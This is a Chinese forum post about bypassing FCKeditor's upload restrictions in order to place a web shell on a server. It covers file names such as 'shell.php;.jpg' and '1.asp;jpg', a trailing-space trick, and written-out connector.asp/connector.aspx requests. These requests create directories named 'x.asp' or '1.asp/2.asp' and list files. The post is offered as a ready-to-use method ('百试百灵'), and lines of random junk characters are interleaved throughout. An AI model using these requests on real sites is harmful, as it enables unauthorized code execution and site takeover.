很多时候上传的文件例如:shell.php.rar 或 shell.php;.jpg 会变为 shell_php;.jpg 这是新版 FCK 的变化,试试上传 1.asp;jpg
) F A; k- l0 X0 e- L! l% Y1 {, H$ D
提交 shell.php+空格 绕过,不过空格只支持 win 系统 *nix 是不支持的,shell.php 和 shell.php+空格 是 2 个不同的文件,未测试。
% e$ j& n5 p6 @# b" i( R6 O1 }. l3 Q; [5 M& r& ^- w
继续上传同名文件可变为 shell.php;(1).jpg,也可以新建一个文件夹,只检测了第一级的目录,如果跳到二级目录就不受限制。3 J4 r" a+ j8 e z4 ?7 d: Q
2 o- r6 `1 d! E# ?$ n; s
突破建立文件夹:
; c7 _, [! a" {4 I; \0 x/ Z N
8 m; A( }+ {* X8 xeditor/FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/qing.asp&NewFolderName=x.asp
) o8 V; d- E1 T! p
}4 ?2 z& o1 |2 k4 ?( p9 b! E' X# t4 l参数:4 `& z" g. S2 P! r" \* A) s4 C
; j5 l/ w2 k6 V" T当前目录名:CurrentFolder=/qing.asp2 k1 F- j- |1 v6 q3 l, a
7 G+ U: p5 W+ j; G$ b新的目录名:NewFolderName=x.asp
3 ]8 ]- a) L( `' t4 g D+ E7 ^+ e1 j! z/ u1 U' Z1 U3 y
其实很简单,在目录那里写 x.asp,然后点击新建目录在弹出来的对话框中随便写……+ R: o* W( e+ E7 [
. g7 Q0 c3 ~" R
那么 x.asp 就已经建立生成了,此方法百试百灵!
* O) D9 q. W% f
' a! X( ?) a4 B2 t2 Q) B' d新建文件夹参数 x.asp,基本都能搞定。
6 N5 c1 Z+ A8 F- M5 R4 P
3 S8 C5 N3 f& J$ ~& a8 I+ s下面这句话是要在1.asp下建立2.asp,当不存在1.asp时会先创建,只过滤了目标目录的创建 而没有过滤不存在目录的创建( h! K! f) J( h* [+ V9 t
# y* [; ]6 Z7 O% D, y
aspx/connector.aspx?Command=CreateFolder&Type=File&CurrentFolder=%2F1.asp&NewFolderName=2.asp, h* Y8 H! d) t% s0 _
! {) k& z6 m( x+ p5 i获取文件列表8 ] s6 T& h5 e/ F/ I8 [8 J
aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=%2F
8 A5 x( W% Q+ |7 p) a y" ~1 r, g7 [6 U2 A
|
发表于 2012-12-31 09:27:09
收藏
支持
反对